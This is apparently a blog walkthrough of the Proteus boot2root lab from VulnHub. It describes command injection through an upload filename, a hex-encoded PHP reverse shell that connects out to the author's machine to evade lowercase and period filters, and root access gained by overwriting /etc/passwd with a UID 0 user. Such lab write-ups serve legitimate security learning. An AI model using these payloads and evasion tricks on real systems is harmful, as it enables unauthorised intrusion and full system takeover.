Hey everyone! It’s been a busy month with work and other life. Fortunately, I had time to work on Proteus, a new boot2root posted on https://www.vulnhub.com/entry/proteus-1,193/. This was a classic design with only a webapp and one flag for achieving root. The hardest work was certainly getting that initial reverse shell. Let’s check out how to root it!
Let’s start off with an nmap scan.
Only web is open.
Interesting. It looks like, as the description says, it’s a web app for “malware” analysis. I tried to brute force the login with some common passwords, but no luck. Let’s try and upload a binary and see what happens.
So it runs strings and objdump -d on the file we upload. It also gives the file a new name and prints out the base64 encoded name of the file. Also of note is we know the path of where the file is uploaded to.
Hey so that worked! I wonder if we can inject PHP code?
Hmm.. Nothing’s there. Let’s check the source.
Ok. So after some research it looks like if it’s a .html file, PHP code won’t run because it’s server-side code and not client side. After fiddling around with this for a while, I decided to move on to another vector. I did spend far too long on this vector.
As a side note, after reading other write-ups, some folks said you could use the XSS to get an admin cookie and login. I like the way I went about it though.
I continued to fiddle around with other fields. What got me interested is two things:
Let’s take a look again at the name of the first file we uploaded:
See that period at the end? I didn’t add that. The other thing that interested me was I uploaded a file.exe and it changed the name to XXXXXXX.exe (after base64 decoding). I messed around with the filename field some more.
Hey! That name looks funny. Let’s base64 decode it.
Score! Our As were injected. Also, it looks like they were converted to lower-case. We’ll come back to this later.
So, the next step took me far too long. After fiddling with the name field, I found that you can inject commands after the period like so:
So, let’s take a pause and see what we know so far.
- We can inject commands
- The commands run with the permissions of the webserver
- All text will be converted to lower-case first
I’ll save you all some time and add two more details that took me a while to find out:
- Any periods will change how the command is processed. That is: filename.&ls -la; bob.exe will turn into: XXXXX.exe. It seems like only everything after the LAST period is run as a command.
- Forward slashes break everything
My first idea was to get a python reverse shell. However, the restrictions on periods were problematic. So my first solution was this:
python -c 'import base64; base64.b64encode("reverse shell code")'
This gives us base64 encoded python code. My plan was to pass a filename like:
filename.&python -c 'import base64; exec(base64.b64decode(\"base64 encoded python code\")'
Notice what’s wrong? Two things: the period will mess everything up and the base64 string will be converted to all lowercase first which will screw up the decoding. Again, this took me hours to figure out (especially the lowercase thing).
I realized that base64 encoding wouldn’t work. Fortunately, there’s another encoding method that doesn’t use uppercase: HEX!
Let’s take a look at similar code with hex.
python -c 'import binascii; print binascii.hexlify("reverse shell code")' filename.&python -c 'import binascii; binascii.unhexlify(\"hexed shell code\")'
But wait… we still have a period! This won’t work.
However, there’s another language that performs similarly but doesn’t require importing a library: PHP!
Here’s the actual PHP code I used:
php -r "print bin2hex('\$sock=fsockopen(\"192.168.88.128\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");');" php -r "eval(hex2bin('24736f636b3d66736f636b6f70656e28223139322e3136382e3138362e313238222c31323334293b6578656328222f62696e2f7368202d69203c2633203e263320323e263322293b'));"
- Add a user “bob” on my local box with password “bob”
- Grabbed the user hash from my local /etc/shadow file
- Create an /etc/passwd line with that hash included (with a UID and GUID of 0)
- Write that Proteus’ /etc/passwd
- Log in as bob (who has root permissions)
Let’s step through it:
I had to mess around with the number of As needed. Also, if you add a new line without enclosing the python script in quotes, it will break everything.
You’ll see that I had to change the name a few times because I messed up a few times.
- Web can be finicky. Sometimes a character can make or break your exploit
- Fuzz all the fields
- Try harder
Thanks for reading everyone!